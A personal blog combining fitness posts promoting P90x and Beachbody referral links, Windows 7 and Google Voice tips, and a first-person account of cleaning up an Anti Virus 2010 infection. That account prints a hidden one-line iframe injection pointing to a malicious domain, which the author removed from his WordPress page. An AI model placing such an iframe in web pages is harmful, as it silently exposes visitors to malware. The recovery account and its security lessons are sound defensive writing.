Tony Horton’s 11 Laws for a Lifetime of Fitness

One of the personal highlights of the Beachbody Coach Summit 2010 for me was Tony Horton… of course. The man is as funny, goofy and passionate in person as he is on the DVDs. He is also very gratious with his time, taking the time to meet and greet with each of us. Along with great work outs, interesting dance moves, he also gave a great presentation that I would like to share. My pictures are the not the clearest, but I think they can convey his energy!

1.) Variety
Variety is the spice of life and fitness. A lifetime of health and fitness is achievable when you can think outside the box. You have to mix it up all the time. Stay curious, creative, and stick with the kinds of workouts that you enjoy. A variety of exercises, workouts, and sports will allow you to avoid injuries, plateaus, and boredom.

2.) Consistency
Improvement and change occur when you do things often. Stopping and starting all the time will kill any momentum you need to succeed. You must find ways to stay in the game. Moderate forms of exercise, done consistently, provide far better results than the occasional full-body pummeling. A lifestyle that includes multiple forms of exercise five to six days a week guarantees results.

3.) Intensity
YOU’RE TOUGHER THAN YOU THINK. The fear of pain or injury from working out is a mindset steeped in failure. You must learn to “Find the Line.” Do the extra rep or two, increase your range of motion, and increase resistance as you get stronger. Intensity goes hand in hand with Variety and Consistency. The combination of the three work together as a triad that creates a platform for success. The programs provide variety. Your plan will keep you consistent.

4.) Purpose
Your purpose is to have a better life. Exercise and eating right help you feel better. When you feel better, you do more. When you do more, you meet other people. A healthy lifestyle gives us the energy to be better than before. We want to participate, share, communicate, and build a community have purpose in our lives. If you had never found Beachbody, you might be right back where you were isolated, with nothing to share, no purpose, because you weren’t doing anything with anyone.

5.) Reality
Why do we want life to be different than it is? Why do we think about who we were and who we’re going to be more than who we are? We certainly talk a good game about who we are now. Why do we try to predict the future with the hope that wishful thinking is enough to change it? Life is NOT the way it was. It’s the way it is. Life is not our fantasy predictions of the future or our glory days of the past. Life is that thing that is happening to you as you read this. We fall into the trap of living in the past and future because right here is not good enough. Back then and up there are keeping you from right now.

6.) Sports
Take the onus off of weight, inches, and body fat percentages and put the focus on MOVING – from dancing, rock climbing, and mountain biking to table tennis. I love that ping-pong! Think in terms of “can do” instead of “look like.” Sports are fun and help develop balance and coordination which in turn accelerates your results. Jump, kick, run, spin, throw, skate, shoot, hit, score, compete . . . PLAY!

7.) The Plan
SCHEDULE ALL WORKOUTS IN ADVANCE. This creates accountability. Plan an entire month ahead of time. Try to schedule as many workouts as possible with friends who have similar goals. WOWY was developed so that we could find an easy and effective way to stay accountable and work out together. Now we’ve got people in Trumbull, CT (my hometown), doing Power 90 at the same time with people in Hollywood. That is cool!

8.) Sleep (and stress)
Stressed out, sleep-deprived people don’t eat right and exercise regularly. Stress depletes energy, strength, and desire, while poor sleep habits affect your moods and immune function along with cognitive and motor performance. Burning the candle at both ends makes it impossible to be fit and healthy.

9.) Loving It
Exercise and workouts involve commitment, determination, planning, consistency, and intensity. If you don’t like what you’re doing, there’s no way on earth you’ll succeed. Enthusiasm is a very big piece of the puzzle. Get creative and stay curious. If you enjoy doing Power 90 exclusively and it works for you, then keep doing it until it doesn’t. If you get part way through P90X and it’s not your cup of tea, then stop, and do something else. Something’s got to bring you back day after day, week after week. Love it (tolerate it) or leave it.

10.) Flexibility
Flexibility is the fountain of youth. Flexible people are much less prone to injury. Yoga and stretching allow you to bring more intensity to your workouts. Flexibility is the key component to becoming less vulnerable and more durable. Aging has a funny way of making everything we do harder. Staying limber and flexible is the way to prevent that from happening.

11.) Food and Supplements
You are what you eat! Food and supplements are your fuel. The right fuel supplies proper energy and recovery through balanced brain chemistry. The right supplements simply fill in gaps in your diet.

Like I said, Tony was more then grations with his time while at the summit and made sure to ham it up for all of us.

And did I mention the man can dance? I mean….who knew? Ok, I have a 2 mb limitation on my initial upload with word press. If you have me as a friend on facebook, you can find the video there until I figure out how to upload manually.

What to do after P90x?

I’ve heard a few folks question what to do after completing P90x. My first thought is to well…do it again! But committing 5-6 days a week for another 90 days just might not be an option.  Yet undoing all the great work and progress is not an option either. A good maintenance routine is needed and Tony Horton provides that with his One On One series! And there is a great new promotion found here: http://beachbodycoach.com/esuite/home/tomhirt?bctid=10115605001

Yeah, I think he did rip his pants.

Ohio obesity rate to hit 50% by 2018. Don’t be part of the statistics!

It’s no secret by now with my friends that I’ve been doing Beachbody’s P90x program by Tony Horton. It’s a great program and has helped me lose almost 50 pounds. But many feel that programs like P90x, or Power Half hour are just too extreme for the normal Joe. Well I just came across this great “Pay it Forward” that Tony Horton put together to help share with those that need to loose weight but don’t think they can do anything about it. This is a great example of the work outs that Tony puts together.

You can check out more information about P90x and other Beachbody products at my Referral link. Click the Join for Free option to get access to the web site which has many tools to help get you started and give you a better idea of what is the best fit.

Fun times with the Anti Virus 2010 Exploit

This whole experience reminds me of my all time favorite excerpt from HHGTTG:

“And there it was,” said Zaphod, “clear as day. A whole section in the middle of both brains that related only to each other and not to anything else around them. Some bastard had cauterized all the synapses and electronically traumatised those two lumps of cerebellum.”

Ford stared at him, aghast. Trillian had turned white.

“Somebody did that to you?” whispered Ford.

“Yeah.”

“But have you any idea who? Or why?”

“Why? I can only guess. But I do know who the bastard was.”

“You know? How do you know?”

“Because they left their initials burnt into the cauterized synapses. They left them there for me to see.”

Ford stared at him in horror and felt his skin begin to crawl.

“Initials? Burnt into your brain?”

“Yeah.”

“Well, what were they, for God’s sake?”

Zaphod looked at him in silence again for a moment. Then he looked away.

“Z.B.,” he said.

So yeah, I pulled a Zaphod Beeblebrox on myself.  The following is a sad tale on how one, I was stupid enough to get infected not once, not twice but three times with Anti Virus 2010!!! Two, I didn’t realize it was my own blog web site that was the culprit (Don’t worry, the exploit has been removed. Read in peace).

So what is Anti Virus 2010? av2010It’s a nasty combination of Spyware, Trojans and Malware all working together. The authors are very familiar with social engineering to get you to take steps to willingly get infected.  They basically pop up an Anti-Virus scanner and make it appear they are helping you to find a problem, and for a fee fix it.  They also take steps to remove valid spyware/virus protection and they make it darn impossible for us mere mortals to remove. I found that the Task manager was locked. So I was unable to remove or stop the offending services. My Anti Virus (AVG) was disabled. MalwareByte was disabled. Spybot Search and destroy was disabled. I tried to reboot and boot in safe mode and got a fake Blue Screen of death. All program file association was lost and I could not manually run a program from the command line. My USB Flash will all my utilities would not be recognized.  I was forced to remove the hard drive and attached to another PC via my handy dandy USB drive connector and scan the harddrive with Malewarebytes.

Re-installed my HD, booting up the PC and appears everything is clean except the damage is still left behind. MalwareBytes is disabled, along with AVG and all program file association. I could not run RegEdit to make the necessary changes, but I was alerted to use ComboFix to clean up the damage. Ran it and sure enough, I’m back in business. Well, MalwareBytes was still damaged, but I could re-install that.  So doing my victory dance jig (not a pretty sight) at this time and the initial phase of the Trojan struck! The web like scanner device was scanning my system! I uttered an expeditive that I’m not too happy about and quickly tried to activate the Task Manager. Too late, everything was locked down again.

So I had to pull the HD a second time, did a repeat of the above.  This time I made sure to run ComboFix in safe mode. I cleaned up all temp files under the profile. Rebooted normally and looks Great! I decided to make a post about this great accomplishment and Bamo! There goes the web Scanner and total lock up!

So I could cry like a little girl or do this all over again. Well, I did both. So out came the Hard drive a 3rd time, did a repeat and this time….this time I made sure I re-installed MalWarebytes and performed a total scan before any dancing or celebreating high fives. And sure enough, it did find the lone strangler. I wish I recorded where it hung out, but by this time I was too lazy to do so. I finally had my system clean and back to normal.

I wish the story ended there, but now comes the complicated part. I have verified at this point the IE is free of any infections. MalwareBytes and AVG are completely updated and scans are showing no problem. Great! This is the perfect time to blog about this nightmare, so I head on over to my blog  and AVG tells me the web site is not safe! And before I know it, the web scanner is kicking off! But this time I was able to intercept the process and kill it. AVG was able to terminate the threat as well. But needless to say, it left me speechless. The only thing I run on my web site is Word Press, which basically builds all the blog pages. Googled Ifram Exploits with Word Press and there it was. I had made the mistake of not keeping the version of Word Press updated, as known exploits where running rampant with old versions. So I was able to inspect the index page, remove the following:

<iframe src=”http://usaforwarding.cn/“; width=”3″ height=”2″></iframe>

If you have Word Press and not sure how to inspect your HTML, then the following utility can help inspect your pages and let you know if the pages have been exploited.

So now my site is exploit free and running the latest update to WordPress (V 2.8.5)

How did I get infected in the first place? At the PC level,  I did something stupid which I tell people never to do. I disabled and closed down AVG while I was trouble shooting a Video card driver issue. Not being able to Play COD makes us do foolish things at times I admit. I then went fishing for MOBO drivers for a friend’s PC and went off the beaten path. So at first, I wasn’t sure when or where the infection started, but I did what any self respected IT person would do, I yelled at my son for infecting my PC.

Where did I get infected? I found out the hard way that my web site index.html page had been victum to an Iframe Exploit. So I owe my son an apology and anyone else that reads my blog…which including my mom makes two people.

If I paid for Anti Virus 2010 can I get my money back? Very unlikely as the whole scheme is to get your CC and perform some identify theft. So if you gave up your CC account, you best report your card is in the wild.

Lessons Learned:

  1. If you’re going to go off the Interwebs beaten paths, then never use IE (Internet Exploder). Use FireFox with the No Scripts Plugin.
  2. Never turn off the Anti-Virus protection to increase system performance.
  3. Make sure you keep Windows updated with the latest security updates.
  4. Make sure MalwareBytes stays updated. Buy the thing, it’s worth it even if it’s free.
  5. Never EVER agree to run scans or click OK if you did not launch the application.
  6. Create an actual day to day user Account that does not have Administrator permissions. For home users, Windows allows us all to be Administrators which is a big mistake. When we pick up an infections, we then basically hand the keys of the city to the troublemaker. If I had used a limited account, I may still have gotten infected, but the damaged would have been minimal.
  7. Before diving into Regedit and causing more harm then good, download and run ComboFix.
  8. Make sure you do the bulk of the scanning in Safe Mode.
  9. If you host a Word Press blog, don’t let your Word Press version go to far without apply updates. The Exploit starts there.

Special thanks to the Jasons and Ramzi for helping me get through this mess and keeping my sanity.

Windows 7 student pricing for $29!!

It’s true, but there is a catch. You need access to an EDU email account.

You can go on-line and submit your email here:  http://www.win741.com/

However, that appears to just qualify you for Windows Home.

As an alternative, pick up the phone and call: 1-877-MY-MS-STORE

I just did that and purchased Windows 7 Professional!  You can select the Upgrade or the Full version. I recommend you go with the Full version just to eliminate the need to verify you qualify for the upgrade at install time.  You can also select to have the DVD shipped, or download. I’m feeling lazy and selected the DVD shipped. If I didn’t already have the RNC version up and running, I might have selected the download and burn the ISO to DVD myself same day.

Windows 7 ships on the 22nd!

Round two of P90x!

After coming up short of graduating from my first effort by just two weeks due to a FIY injury, I’ve decided to go another round. They say it takes 2 weeks for every week off. I think that’s a fair statement as I was off a good month and it’s slow progress to get back to my all time low pictured below.

tombefore_after2Actually I made it down to 165. I’m now hovering around 172 and getting closer again! P90x is an awesome way to get fit. If it appears a bit over whelming, then Slim 6 might be the better choice. You can get more information from my referral link. Just click on SHOP PRODUCTS and select Video. P90x is a 12 set DVD program. So you are interested in P90x, I would really appreciate it if you purchase from my referral link, Thanks!!!

At a minimum, use my referral link to click the free join option. This lets you create an account and get access to some cool web tools on the Beachbody community web site. I can then help you with the WOWY (on-line gym) to share a recommended schedule and routine. Yeah, it’s 6 days a week for 90 days, but after 2 weeks it will become automatic. The only thing you need to figure out is are you a morning or evening workout kinda person?

Google Voice

If you haven’t already signed up for Google voice, I highly recommend you do so.

What does it do? In a nutshell, you get a new phone number which you can then configure to call as many phone numbers as you wish at the same time. Get a new cell phone, no problem, just drop the old number in the configuration and add the new number.

If you missed to call, then the reall cool feature kicks in. You can have your voicemails transcribed and sent to your cell phone as a text message, or to your email. I do both. What a great resource this is, when you are in a meeting, and you can quickly check the text of the message.

oh, and you get a cool wigdet like this:
